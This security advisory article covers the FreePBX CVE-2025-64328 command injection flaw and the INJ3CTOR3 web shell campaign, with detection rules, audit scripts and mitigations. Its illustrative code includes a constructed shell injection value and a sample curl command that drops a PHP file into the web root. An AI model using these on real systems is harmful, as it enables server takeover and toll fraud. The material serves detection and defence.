900+ FreePBX Servers Compromised via Web Shell — CVE-2025-64328
Over 900 Sangoma FreePBX instances remain infected with EncystPHP web shells, deployed through a post-authentication command injection vulnerability. The Shadowserver Foundation revealed the scale of the INJ3CTOR3 campaign, with compromised servers concentrated heavily in the United States.
What Happened
In November 2025, researchers disclosed CVE-2025-64328, a post-authentication command injection flaw affecting Sangoma FreePBX 17.0.2.36 and later releases prior to the 17.0.3 fix. By early December, threat actors launched the INJ3CTOR3 operation, mass-exploiting unpatched instances to deploy the EncystPHP web shell.
As of February 2026, over 900 instances remain compromised:
| Country | Infected Instances |
|---|---|
| United States | 401 |
| Brazil | 51 |
| Canada | 43 |
| Germany | 40 |
| France | 36 |
CISA added CVE-2025-64328 to the Known Exploited Vulnerabilities (KEV) catalog in February 2026.
How CVE-2025-64328 Works
The vulnerability lives in the FreePBX Administration panel. An authenticated user can inject arbitrary shell commands through input fields whose contents reach the operating system shell without proper sanitization. The injected commands run as the asterisk user, the service account that holds elevated privileges within the FreePBX (and Elastix-derived) environment, so command execution at this level amounts to control of the whole PBX.
Key Details:
- CVE: CVE-2025-64328
- CVSS: 8.6 (HIGH)
- Type: Post-authentication command injection
- Affected: FreePBX 17.0.2.36 and later, prior to 17.0.3
- Patched: FreePBX 17.0.3
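To make the flaw class concrete, here is an added illustration of post-authentication command injection beside its hardened form. It is generic example code written for this page, not FreePBX's code: the page does not identify the affected input field, and this snippet does not claim to. `echo` stands in for the Asterisk CLI binary (an assumption so the example runs without Asterisk installed), and the injected peer name is constructed for the walkthrough.

```python
import re
import subprocess

# Stand-in for the PBX command-line binary so the example runs anywhere.
# Assumption: a real admin handler would invoke something like `asterisk -rx`.
CLI_BIN = "echo"

def vulnerable_peer_status(peer: str) -> str:
    """Illustrative injection sink: the user-supplied peer name is pasted into a
    shell string, so quotes and metacharacters in it are parsed by /bin/sh."""
    cmd = f"{CLI_BIN} 'sip show peer {peer}'"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

# Allowlist for a SIP peer/extension name; anything else is rejected outright.
PEER_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")

def is_valid_peer(peer: str) -> bool:
    return PEER_RE.fullmatch(peer) is not None

def hardened_peer_status(peer: str) -> str:
    """Hardened form: validate against the allowlist, then pass arguments as a
    list so no shell ever interprets the user-controlled value."""
    if not is_valid_peer(peer):
        raise ValueError(f"rejected peer name: {peer!r}")
    argv = [CLI_BIN, f"sip show peer {peer}"]
    return subprocess.run(argv, capture_output=True, text=True).stdout

# Constructed attacker input: closes the single-quoted argument, runs `id`,
# then reopens a quote so the resulting shell string stays syntactically valid.
INJECTED = "1001'; id; echo '"

if __name__ == "__main__":
    # The vulnerable path prints the output of `id` after the intended command.
    print("vulnerable ->", vulnerable_peer_status(INJECTED))
    try:
        hardened_peer_status(INJECTED)
    except ValueError as exc:
        print("hardened   ->", exc)
    print("hardened   ->", hardened_peer_status("1001"))
```

The second version fixes the bug twice over: the allowlist rejects the payload before anything runs, and even if validation were bypassed the argument list keeps the value out of shell parsing. Either fix alone would stop this payload; defence in depth is cheap here.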
The EncystPHP Web Shell
Once attackers gain command execution, they deploy EncystPHP — a PHP-based web shell that provides:
- Persistent remote command execution
- File upload/download capabilities
- Database access
- Lateral movement staging
The web shell operates with the privileges of the asterisk service account, which typically has access to call detail records, voicemail files, SIP credentials, and system configuration.
VoIP-Specific Risks
Compromised PBX systems create unique threats beyond typical server compromise:
Toll Fraud: Attackers route international calls through compromised PBX systems, generating thousands of dollars in charges per hour. The INJ3CTOR3 campaign has been linked to outbound call activity from compromised instances.
Call Interception: With access to the asterisk process, attackers can monitor live calls, capture DTMF tones (credit card numbers entered via phone), and record conversations.
Lateral Movement: FreePBX servers often sit on internal networks with access to other infrastructure, making them valuable pivot points.
MITRE ATT&CK Mapping
| Technique | Name |
|---|---|
| T1190 | Exploit Public-Facing Application |
| T1505.003 | Server Software Component: Web Shell |
| T1059.004 | Command and Scripting Interpreter: Unix Shell |
| T1496 | Resource Hijacking (Toll Fraud) |
Detection
Sigma Rule: Web Shell in FreePBX Web Root
```yaml
title: Web Shell Detected in FreePBX Web Root
status: experimental
logsource:
  category: file_event
  product: linux
detection:
  selection:
    TargetFilename|contains:
      - '/var/www/html/'
      - '/var/lib/asterisk/'
    TargetFilename|endswith:
      - '.php'
  filter:
    Image|contains:
      - '/usr/bin/yum'
      - '/usr/bin/apt'
  condition: selection and not filter
level: high
```

Note that legitimate FreePBX module updates (fwconsole, running under PHP) also write .php files beneath /var/www/html/admin/modules/, so this rule will fire during maintenance windows; extend the filter to match your own update process rather than lowering the level.
Sigma Rule: Asterisk Process Spawning Shell
```yaml
title: Asterisk Process Spawning Shell Commands
status: experimental
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    ParentImage|endswith: '/asterisk'
    Image|endswith:
      - '/bin/sh'
      - '/bin/bash'
  condition: selection
level: critical
```

Asterisk does spawn shells legitimately, for example through the System() and TrySystem() dialplan applications and AGI scripts, so baseline normal call flow before treating every hit as critical.
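The following added example (written for this page, not taken from the campaign reporting or from FreePBX) applies the logic of the two Sigma rules above to a handful of constructed endpoint events, so the selection, filter and condition clauses can be seen working. Field names follow the Sigma Linux `file_event` and `process_creation` taxonomy; the paths, IP address and file names in the sample events are made up and are not indicators from the INJ3CTOR3 campaign.

```python
WEB_ROOTS = ("/var/www/html/", "/var/lib/asterisk/")
PACKAGE_MANAGERS = ("/usr/bin/yum", "/usr/bin/apt")
SHELLS = ("/bin/sh", "/bin/bash")

def rule_web_shell_in_web_root(ev: dict) -> bool:
    """Rule 1: a .php file written under a FreePBX web root by anything other
    than the package manager (selection and not filter)."""
    if ev.get("category") != "file_event":
        return False
    target = ev.get("TargetFilename", "")
    selection = any(root in target for root in WEB_ROOTS) and target.endswith(".php")
    filtered = any(pm in ev.get("Image", "") for pm in PACKAGE_MANAGERS)
    return selection and not filtered

def rule_asterisk_spawns_shell(ev: dict) -> bool:
    """Rule 2: the asterisk daemon is the direct parent of a shell."""
    if ev.get("category") != "process_creation":
        return False
    return (ev.get("ParentImage", "").endswith("/asterisk")
            and ev.get("Image", "").endswith(SHELLS))

RULES = [
    ("Web Shell Detected in FreePBX Web Root", "high", rule_web_shell_in_web_root),
    ("Asterisk Process Spawning Shell Commands", "critical", rule_asterisk_spawns_shell),
]

# Constructed sample telemetry (what an auditd/Sysmon-for-Linux forwarder might emit).
SAMPLE_EVENTS = [
    # 0: asterisk spawns a shell that pulls a PHP file into the web root -> rule 2
    {"category": "process_creation", "ParentImage": "/usr/sbin/asterisk", "Image": "/bin/sh",
     "CommandLine": "sh -c 'curl -s http://198.51.100.7/s.txt -o /var/www/html/admin/images/c.php'"},
    # 1: the downloaded file lands in the web root, written by curl -> rule 1
    {"category": "file_event", "Image": "/usr/bin/curl",
     "TargetFilename": "/var/www/html/admin/images/c.php"},
    # 2: package manager replaces a core PHP file -> excluded by the filter
    {"category": "file_event", "Image": "/usr/bin/yum",
     "TargetFilename": "/var/www/html/admin/index.php"},
    # 3: fwconsole module update, written by PHP -> rule 1 fires (benign, needs tuning)
    {"category": "file_event", "Image": "/usr/bin/php",
     "TargetFilename": "/var/www/html/admin/modules/core/Console/Helper.php"},
    # 4: asterisk runs an AGI script via the PHP interpreter -> no shell, no match
    {"category": "process_creation", "ParentImage": "/usr/sbin/asterisk", "Image": "/usr/bin/php",
     "CommandLine": "/usr/bin/php /var/lib/asterisk/agi-bin/dialparties.agi"},
    # 5: the web server spawns a shell -> not covered by rule 2 as written
    {"category": "process_creation", "ParentImage": "/usr/sbin/httpd", "Image": "/bin/sh",
     "CommandLine": "sh -c 'id'"},
]

def evaluate(events) -> list:
    """Run every rule over every event; return one alert per (event, rule) match."""
    alerts = []
    for idx, ev in enumerate(events):
        for title, level, rule in RULES:
            if rule(ev):
                alerts.append({"event": idx, "title": title, "level": level})
    return alerts

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(f"[{alert['level']:>8}] event {alert['event']}: {alert['title']}")
```

Two things the sample set makes visible. Event 3 is the false positive the caveat above warns about: a module update looks exactly like a web shell drop to rule 1, so the filter needs the update path added. Event 5 is a miss: command injection through the admin panel executes under the web server (httpd or php-fpm, running as the asterisk user), not under the asterisk daemon, so a copy of rule 2 with `ParentImage|endswith` covering `/httpd`, `/apache2` and `/php-fpm` is worth deploying alongside it.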
Manual Detection Commands
```bash
# List PHP files in the web root modified more recently than index.php
find /var/www/html -name "*.php" -newer /var/www/html/index.php -exec ls -la {} \;

# Show the children of each asterisk process (a shell child outside System()/AGI use is suspicious)
for pid in $(pgrep -x asterisk); do
  ps -o pid,ppid,user,etime,cmd --ppid "$pid"
done

# Hash PHP files modified in the last 30 days for comparison against a clean install
find /var/www/html -name "*.php" -mtime -30 -exec md5sum {} \;
```
Mitigation
- Patch immediately: update to FreePBX 17.0.3. Patching closes the entry point but does not remove a shell that is already present, so scan after patching.
- Scan for web shells: check /var/www/html/ and /var/lib/asterisk/ for unauthorized PHP files
- Restrict admin access: limit the FreePBX Administration panel to trusted IPs only
- Deploy WAF: block command injection patterns in HTTP requests
- Enable FIM: monitor web roots for unauthorized file changes
- Rotate credentials: change all SIP passwords, AMI credentials, and admin passwords
- Audit CDR: review Call Detail Records for unauthorized outbound calls
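The CDR audit step is the one most often skipped, so here is an added worked example of it (written for this page, not FreePBX tooling) that triages a constructed slice of Asterisk's Master.csv for the toll-fraud pattern described above: international destinations, outside business hours, long or rapid-fire calls from a single extension. It assumes the stock cdr_csv column order with uniqueid and userfield enabled, a North American dial plan where 011 is the international prefix, and business hours of 07:00 to 19:00 local time; all three are assumptions to adjust for your install, and the call records are made up.

```python
import csv
import io
import re
from collections import defaultdict
from datetime import datetime

# Stock cdr_csv column order (assumption: uniqueid and userfield enabled in cdr.conf).
CDR_FIELDS = ["accountcode", "src", "dst", "dcontext", "clid", "channel", "dstchannel",
              "lastapp", "lastdata", "start", "answer", "end", "duration", "billsec",
              "disposition", "amaflags", "uniqueid", "userfield"]

# Assumptions for the heuristics: NANP dial plan, 07:00-19:00 business hours, 30 min long-call threshold.
INTERNATIONAL_RE = re.compile(r"^(011|00|\+)\d{7,}$")
BUSINESS_HOURS = (7, 19)
LONG_CALL_SEC = 1800

# Constructed sample of /var/log/asterisk/cdr-csv/Master.csv. Not real call records.
SAMPLE_CDR = '''\
"","1001","5551234567","from-internal","""Alice"" <1001>","PJSIP/1001-00000001","PJSIP/trunk-00000002","Dial","PJSIP/5551234567@trunk,300","2026-02-10 10:15:02","2026-02-10 10:15:09","2026-02-10 10:21:44","402","395","ANSWERED","3","1770718502.1",""
"","1002","0114420712345678","from-internal","""Bob"" <1002>","PJSIP/1002-00000003","PJSIP/trunk-00000004","Dial","PJSIP/0114420712345678@trunk,300","2026-02-10 14:02:10","2026-02-10 14:02:18","2026-02-10 14:05:00","170","162","ANSWERED","3","1770732130.3",""
"","1001","011252634567890","from-internal","""Alice"" <1001>","PJSIP/1001-00000011","PJSIP/trunk-00000012","Dial","PJSIP/011252634567890@trunk,300","2026-02-11 02:11:03","2026-02-11 02:11:09","2026-02-11 02:58:41","2858","2852","ANSWERED","3","1770775863.11",""
"","1001","011252634567891","from-internal","""Alice"" <1001>","PJSIP/1001-00000013","PJSIP/trunk-00000014","Dial","PJSIP/011252634567891@trunk,300","2026-02-11 02:11:05","2026-02-11 02:11:12","2026-02-11 03:01:09","3004","2997","ANSWERED","3","1770775865.13",""
"","1001","01137012345678","from-internal","""Alice"" <1001>","PJSIP/1001-00000015","PJSIP/trunk-00000016","Dial","PJSIP/01137012345678@trunk,300","2026-02-11 02:12:40","","2026-02-11 02:13:10","30","0","NO ANSWER","3","1770775960.15",""
'''

def parse_cdr(text: str) -> list:
    """Parse Master.csv text into dicts keyed by the cdr_csv field names."""
    return list(csv.DictReader(io.StringIO(text), fieldnames=CDR_FIELDS))

def triage_call(row: dict) -> list:
    """Return the reasons a single CDR row looks like toll fraud (empty if none)."""
    reasons = []
    if INTERNATIONAL_RE.match(row["dst"]):
        reasons.append("international")
    start = datetime.strptime(row["start"], "%Y-%m-%d %H:%M:%S")
    if start.weekday() >= 5 or not (BUSINESS_HOURS[0] <= start.hour < BUSINESS_HOURS[1]):
        reasons.append("after_hours")
    if int(row["billsec"]) >= LONG_CALL_SEC:
        reasons.append("long_call")
    return reasons

def audit(text: str):
    """Flag international calls that also trip at least one more heuristic, and
    roll up flagged minutes per source extension so the abused account stands out."""
    flagged = []
    per_ext = defaultdict(lambda: {"calls": 0, "intl_minutes": 0.0})
    for row in parse_cdr(text):
        reasons = triage_call(row)
        # One international call in business hours is normal traffic; escalate on combinations.
        if "international" in reasons and len(reasons) >= 2:
            flagged.append({"src": row["src"], "dst": row["dst"], "start": row["start"],
                            "billsec": int(row["billsec"]), "reasons": reasons})
            per_ext[row["src"]]["calls"] += 1
            per_ext[row["src"]]["intl_minutes"] += int(row["billsec"]) / 60
    return flagged, dict(per_ext)

if __name__ == "__main__":
    flagged, per_ext = audit(SAMPLE_CDR)
    for f in flagged:
        print(f"{f['start']}  {f['src']} -> {f['dst']}  {f['billsec']}s  {','.join(f['reasons'])}")
    for ext, stats in sorted(per_ext.items(), key=lambda kv: -kv[1]["intl_minutes"]):
        print(f"ext {ext}: {stats['calls']} suspicious calls, {stats['intl_minutes']:.1f} international minutes")
```

Extension 1002's daytime call to the UK is international but otherwise ordinary and is left alone; extension 1001's three overnight calls to high-cost destinations, two of them nearly an hour long and overlapping, are the signature of a compromised SIP credential or a shell driving the dialplan. On a real system run this over the CDR database (asteriskcdrdb) rather than the CSV, and treat any flagged extension as a credential to rotate immediately, per the mitigation list above.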
The Attacker's Perspective
VoIP infrastructure is a soft target. FreePBX servers are often deployed by IT teams focused on functionality, not security — left unpatched, exposed to the internet, with default or weak admin credentials. The post-authentication requirement for CVE-2025-64328 is barely a barrier when admin panels use admin:admin or credentials harvested from other breaches.
The payoff is immediate: toll fraud generates direct revenue, and the compromised server provides a persistent foothold for further operations.
The Defender's Gap
Most organizations treat their PBX like a phone system, not a server. It rarely gets the same patching cadence, monitoring, or access controls as web servers or databases. The INJ3CTOR3 campaign exploits this blind spot — 900+ servers compromised months after a patch was available tells the full story.
Need help assessing your exposure? Apply to our Beta Tester Program at theinsider-x.com — limited slots available.
Sources: TheHackerNews, Shadowserver Foundation, Fortinet FortiGuard Labs, FreePBX Security Advisory